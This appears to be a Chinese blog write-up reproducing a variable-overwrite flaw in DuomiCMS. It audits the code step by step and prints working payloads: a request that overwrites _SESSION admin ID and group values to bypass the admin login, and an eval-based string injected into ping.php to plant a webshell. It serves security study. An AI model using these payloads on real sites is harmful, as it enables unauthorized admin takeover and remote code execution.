duomicms 变量覆盖漏洞复现

最新推荐文章于 2023-12-20 10:57:28 发布
最新推荐文章于 2023-12-20 10:57:28 发布
阅读量883 收藏 20
点赞数 23
文章标签: web安全 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59023242/article/details/135080259
版权

目标

在不知道后台账户密码的情况下进入管理员后台

全局搜索*$$*

在这里插入图片描述

  • 其中先发现id=83、88、92的文件中存在foreach遍历,优先查看

文件common.php

第52-55行
foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
	foreach($$_request as $_k => $_v) ${$_k} = _RunMagicQuotes($_v);
}
  • 首先通过遍历包含'_GET','_POST','_COOKIE'的数组,依次赋值给变量$_request
foreach($$_request as $_k => $_v)
  • $$_request代表的是含有全局变量($_GET、$_POST、$_COOKIE)数组
  • 动态的调用对应的全局变量,将每个数组元素的键值对分别赋值为$_k$_v
${$_k} = _RunMagicQuotes($_v);
  • 根据$_k的值动态的创建变量,并将经过函数_RunMagicQuotes处理后的$_v的值赋给,这个变量${$_k}
    • 其中_RunMagicQuotes为处理参数中魔术引号的函数
第28-34行
foreach($_REQUEST as $_k=>$_v) //循环遍历$_REQUEST变量,每个数组元素的键值对分别赋值为`$_k`和`$_v`
{
	if( strlen($_k)>0 && m_eregi('^(cfg_|GLOBALS)',$_k) && !isset($_COOKIE[$_k]) )
	{
		exit('Request var not allow!');
	}
}
  • 首先循环遍历变量 R E Q U E S T ,每个数组元素的键值对分别赋值为 ‘ _REQUEST,每个数组元素的键值对分别赋值为` REQUEST,每个数组元素的键值对分别赋值为_k$_v`
  • 判断键名$_k,如果键名不为空且以cfg_|GLOBALS开头,并在COOKIE中没有设置相应的值,则终止程序,返回信息非法参数
总结

文件common.php,通用模块文件,可能是一个对外部提交的参数做处理的文件,暂时没有问题,可以先查看哪些文件调用了这个文件

全局搜索common.php

在这里插入图片描述

  • 由于我们的目的是进行后台,优先查看/admin/目录下的文件

文件config.php

第27-33行
//检验用户登录状态
$cuserLogin = new userLogin(); //实例化了一个userLogin类的对象
if($cuserLogin->getUserID()==-1)
{
	header("location:login.php?gotopage=".urlencode($EkNowurl));
	exit();
}
  • 发现有个处理用户登录状态的语句
  • getUserID()==-1时执行跳转功能
  • 定位查看userLogingetUserID()
    • 文件check.admin.php

文件check.admin.php

第34-43行
	var $userName = '';
	var $userPwd = '';
	var $userID = '';
	var $adminDir = '';
	var $groupid = '';
	var $keepUserIDTag = "duomi_admin_id";
	var $keepgroupidTag = "duomi_group_id";
	var $keepUserNameTag = "duomi_admin_name";
  • 其中发现三个变量$keepUserIDTag,$keepgroupidTag,$keepUserNameTag
  • 推测可能是用于存储用户id、用户组id、用户名的变量
第72行
	//检验用户是否正确
	function checkUser($username,$userpwd)
  • 发现是一个检查用户的函数
  • 继续审计
第77-79行
//只允许用户名和密码用0-9,a-z,A-Z,'@','_','.','-'这些字符
$this->userName = m_ereg_replace("[^0-9a-zA-Z_@!\.-]",'',$username);
$this->userPwd = m_ereg_replace("[^0-9a-zA-Z_@!\.-]",'',$userpwd);
$pwd = substr(md5($this->userPwd),5,20);
  • 规定用户名密码,并对输入的密码进行了md5加密
第80-81行
$dsql->SetQuery("Select * From `duomi_admin` where name like '".$this->userName."' and state='1' limit 0,1");
$dsql->Execute();
  • 通过select方法,返回当前用户名且state='1'的数据
第82行
$row = $dsql->GetObject();

  • 一个获取数据库查询结果中的对象的方法

    	function GetObject($id="me")
	{
		if($this->result[$id]==0)
		{
			return false;
		}
		else
		{
			return mysql_fetch_object($this->result[$id]);
		}
	}

  • 即返回变量$id的结果集

  • 最后赋值给**$row**

第83-101行
		if(!isset($row->password))
		{
			return -1;
		}
		else if($pwd!=$row->password)
		{
			return -2;
		}
		else
		{
			$loginip = GetIP();
			$this->userID = $row->id;
			$this->groupid = $row->groupid;
			$this->userName = $row->name;
			$inquery = "update `duomi_admin` set loginip='$loginip',logintime='".time()."' where id='".$row->id."'";
			$dsql->ExecuteNoneQuery($inquery);
			return 1;
		}
	}
  • 用于验证用户登录信息并获取用户id、用户组id、用户名以及更新IP
第105-124行
	//保持用户的会话状态
	//成功返回 1 ,失败返回 -1
	function keepUser()
	{
		if($this->userID!=""&&$this->groupid!="")
		{
			global $admincachefile;
			$_SESSION[$this->keepUserIDTag] = $this->userID;
			$_SESSION[$this->keepgroupidTag] = $this->groupid;
			$_SESSION[$this->keepUserNameTag] = $this->userName;

			$fp = fopen($admincachefile,'w');
			fwrite($fp,'<'.'?php $admin_path ='." '{$this->adminDir}'; ?".'>');
			fclose($fp);
			return 1;  //登录成功
		}
		else
		{
			return -1; //登录失败
		}
	}
  • 当用户id和组id不为空时,将获取到的userIDgroupiduserName传递到SESSION中存储,以保持登录状态

思考

  • 我们可以通过修改session值,伪造管理员的身份进入后台
$fp = fopen($admincachefile, 'w');
fwrite($fp, '<?php $admin_path =' . " '{$this->adminDir}'; ?>");
fclose($fp);
  • 将管理员目录路径写入文件
第136行-146行
//获得用户的权限值
function getgroupid()
	{
		if($this->groupid!='')
		{
			return $this->groupid;
		}
		else
		{
			return -1;
		}
	}
  • 发现是一个获取权限值的函数
  • 我们可以查看有哪些权限

全局搜索$groupid

在这里插入图片描述

文件admin_manager.php

第101-110行
function getManagerLevel($groupid)
{
	if($groupid==1){
		return "系统管理员";
	}else if($groupid==2){
		return "网站编辑员";
	}else{
		return "未知类型";
	}
}
  • 发现组id为1时权限为系统管理员
  • 组id为2时权限为网站编辑员

思考

  • 所以此时我们可以利用组id=1来伪造管理员的身份
  • 而用户id和用户名发现做其他过滤,合理即可

相关代码

	var $keepUserIDTag = "duomi_admin_id";
	var $keepgroupidTag = "duomi_group_id";
	var $keepUserNameTag = "duomi_admin_name";
	+
	$_SESSION[$this->keepUserIDTag] = $this->userID;
	$_SESSION[$this->keepgroupidTag] = $this->groupid;
	$_SESSION[$this->keepUserNameTag] = $this->userName;
	||
  $_SESSION[duomi_admin_id]
  $_SESSION[duomi_group_id]
  $_SESSION[duomi_admin_name]

  • 通过变量覆盖进行构造

    _SESSION[duomi_admin_id]=10&_SESSION[duomi_group_id]=1&_SESSION[duomi_admin_name]=zmh

  • 寻找可以使用session的文件

    • 包含session_start()

全局搜索session_start()

在这里插入图片描述

  • 发现其中有27个文件,进行筛选
    • 包含文件common.php

测试

文件comment.php
在这里插入图片描述

登录成功,进入后台

在这里插入图片描述

写马

在这里插入图片描述

payload

  • 查看ping.php文件,发现需要构造闭合
    在这里插入图片描述
123";eval($_REQUEST[6]);"

成功

在这里插入图片描述

获取webshell

在这里插入图片描述

灮迦
关注
  • 23
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
多米cmsduomicms变量覆盖漏洞(超详细)
kiwi的博客
11-01 826
本文章我借鉴了代码审计实战 - FreeBuf网络安全行业门户的文章,文章写的比较详细,大家也可以看看他写的文章。
Duomicms1.32代码执行漏洞(个人理解)
kiwi的博客
10-30 941
代码审计实战 - FreeBuf网络安全行业门户与DuomiCMS 前台命令执行 // 云屿's Blog (cloudyu.me)的文章的帮助本文章可能有写的不对的地方或者思路需要改进的地方,欢迎师傅们批评指正。
Duomicms_X2.0变量覆盖通杀漏洞复现
seek_2022的博客
07-13 1660
出于学习和技术分享的目的撰写了本文,希望能给读者们学习挖掘此类漏洞提高一点参考。
DuomiCMS代码审计-变量覆盖漏洞复现
最新发布
小小小屿屿屿的博客
12-20 1575
Duomicms是一个开源免费的系统,但是其中也存在漏洞,本文从代码审计角度去详细阐述其中存在的一个变量覆盖漏洞
Duomicms变量覆盖漏洞
B_roin的博客
04-19 590
变量覆盖 1.变量覆盖是指可以用我们的传参值替换程序原有的变量值 2.经常导致变量覆盖漏洞场景有:$$(可变变量)使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局变量注册等 1 . extract()函数:从数组中将变量导入到当前的符号表 (来源:菜鸟教程) [该函数使用数组键名作为变量名,使用...
Duomicms变量覆盖
yqdid的博客
04-20 346
Duomicms变量覆盖漏洞 由于是第一次搞这个 ,不是很懂。。 所以 思路是参考这位博主的 https://www.cnblogs.com/Qiuzhiyu/p/11923471.html 首先去了解一下 变量覆盖漏洞的原理: 变量覆盖漏洞是指可以用我们自定义的参数值替换程序原有的变量值,从而产生漏洞。大多都是由于函数使用不当导致,经常导致变量覆盖漏洞的函数有:extract()函数、pars...
DuoMiCms资源采集插件 v3.1
12-04
DuoMiCms资源采集插件是一个基于多米cms影视管理系统,而进行开发的自动采集插件。 重要提示: 200在线资源和C值部分需要解析。201C值资源需要解析。 如果你们没有接口可以下载下方借口。 使用说明: 将文件api.php ...
多米(DuomiCms)影视管理系统 X1.1
11-27
DuomiCms采用PHP+MYSQL架构原生PHP代码带来卓越的访问速度和负载能力免去您的后顾之优。众多人性化功能设计,超前定时执行任务,让您处理数据得心应手,您只需要专心做内容运营,其
DuoMiCms资源采集插件 v2.0
12-05
DuoMiCms资源采集插件是一个基于多米cms影视管理系统,而进行开发的自动采集插件。
DuomiCms 多米影视管理系统 X2.0
11-27
DuomiCms采用PHP+MYSQL架构原生PHP代码带来卓越的访问速度和负载能力免去您的后顾之优。众多人性化功能设计,超前定时执行任务,让您处理数据得心应手,您只需要专心做内容运营,其
多米(DuomiCms)影视管理系统
02-01
一套完整的多米(DuomiCms)影视管理系统
多米(DuomiCms)影视管理系统 X2.0
10-22
DuomiCms采用PHP+MYSQL架构,原生PHP代码带来卓越的访问速度和负载能力免去您的后顾之优。众多人性化功能设计,超前定时执行任务,让您处理数据得心应手,您只需要专心做内容运营,其它的交给我们。为符合SEO要求开发大量功能,比如百度结构化数据生成,搜索引擎地图等。全新设计的专题管理,同时支持主分类,扩展分类,剧情分类三种分类方式,让网站内容与众不同。简单易用丰富的模板标签,方便网站模板设计制作,让网站更显专业。DuomiCms是基于PHP+MySql技术开发的影视管理系统,强劲功能、卓越性能、安全健壮。简单易用、制作模板方便。构架稳健,平滑升级。多米(DuomiCms)影视管理系统 更新日志:X2.0修复cms播放器调用修改_支持任意目录安装整合link播放器修复顶部模板错位修复播放器错位后期资源不在纳入版本更新中,资源自动更新。X1.1修复解析播放器修复后台推广选项X1.0核心文件开源 新增采集资源管理[资源库列表&资源库管理]新增下载来源管理新增资源API插件[共享自己资源给别人采集] 后台控制开关 文件在根目录zyapi.php新增百度推送新增微信公众号新增首页公告,可
多米(DuomiCms)影视管理系统 视频点播系统 视频网站源码
01-05
DuomiCms采用PHP+MYSQL架构,原生PHP代码带来卓越的访问速度和负载能力免去您的后顾之优。众多人性化功能设计,超前定时执行任务,让您处理数据得心应手,您只需要专心做内容运营,其它的交给我们。 为符合SEO要求开发大量功能,比如百度结构化数据生成,搜索引擎地图等。全新设计的专题管理,同时支持主分类,扩展分类,剧情分类三种分类方式,让网站内容与众不同。简单易用丰富的模板标签,方便网站模板设计制作,让网站更显专业。 DuomiCms是基于PHP+MySql技术开发的影视管理系统,强劲功能、卓越性能、安全健壮。简单易用、制作模板方便。构架稳健,平滑升级。 多米(DuomiCms)影视管理系统 v1.32 更新日志: 修复迅雷下载功能 修复模板错位代码 修复后台第三方采集资源 修复延迟加载图片以及代码 美化后台部分代码 去除部分无效代码 新增显示官方版本 新增官方资源 新增14个解析播放器 修复无效播放器默认支持解析
多米(DuomiCms)影视管理系统 v1.3 utf-8
12-06
多米影视管理系统(DuomiCms,多米CMS)是一套专为不同需求的而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需3分钟即可建立一个海量的视频讯息的行业网站。 DuomiCms采用PHP+MYSQL架构,原生PHP代码带来
DuoMiCms资源采集插件 v3.1.zip
07-14
DuoMiCms资源采集插件 更新日志: 2016-10-06更新说明: 1、去除无效资源接口 2、修复C值资源站接口 3、新增授权资源站接口 DuoMiCms资源采集插件简介 DuoMiCms资源采集插件是一个基于多米cms影视管理系统,而进行开发的自动采集插件。 DuoMiCms资源采集插件页面展示 相关阅读 同类推荐:站长常用源码
duomicms代码审计1
08-03
Duomicms 代码审计是一个重要的安全实践,目的是发现潜在的安全漏洞和编码问题。在这个特定的审计过程中,我们关注了几个关键点,它们涉及到系统运行的流程、文件结构、以及对外部输入的处理。 首先,审计从程序...
DuomiCms X1.0 变量覆盖漏洞复现
weixin_51681694的博客
04-22 255
上面的代码是对用户的 get,post,cookie传参进行处理,将上述的参数名字都作为变量名字,将参数值都作为变量值。从而导致了可能的变量覆盖漏洞(右侧的函数是对双引号单引号转义处理)漏洞点在 /domiphp/common.php 的 52行代码上。首先插桩查看管理员session。查找一些引用了漏洞文件的页面。尝试自定义session。
DuomiCms中的变量覆盖漏洞复现
huang145247的博客
10-25 199
只有一个方法,而且这个方法是调用$zip对象中的方法,并不是php的内置函数,不符合要求,找下一个方法parse_str(),没结果(没结果不展示了,节省空间)这一个函数是用来转义魔术引号的,也就是说是用来防止注入的,如果我们可以通过上面找到的创建变量的方法来进行变量覆盖即可绕过这个过滤方法。由于原文件不存在危险函数,所以我们需要寻找包含common.php文件的文件(包含common.php的文件有可能会调用这个函数)是但是有很多,我们慢慢找,找到可以利用的创建变量方法。由此联想到session覆盖
代码审计duomicms变量覆盖漏洞
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-16 654
变量覆盖漏洞 什么是变量覆盖变量覆盖指的是可以用我们的传参值替换程序原有的变量值 如下 <?php $a=123; $a=1; echo $a; ?> 怎么去寻找变量覆盖? 经常导致变量覆盖漏洞场景有: $$使用不当,extract()函数使用不当,parse_str()函数使用不当import_request_variables()使用不当,开启了全局变量注册等。 经常引发变量覆盖漏洞的函数有:extract() parse_str() import_request_variab
[zkaq靶场]变量覆盖--duomi cms通杀漏洞
wwxxee
05-12 985
变量覆盖 变量覆盖:值我们可以用我们的传参值去替换程序原有的变量值。 经常导致变量覆盖漏洞场景有: $$使用不当; extract()函数使用不当; parse_str()函数使用不当; import_request_variables()使用不当,开启了全局变量注册等。 $$ 导致的变量覆盖问题在CTF代码审计题目中经常在foreach中出现,如以下的示例代码,使用foreach来遍历数组中的值,然后再将获取到的数组键名作为变量,数组中的值作为变量的值。因此就产生了变量覆盖漏洞。 例如: <?php

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值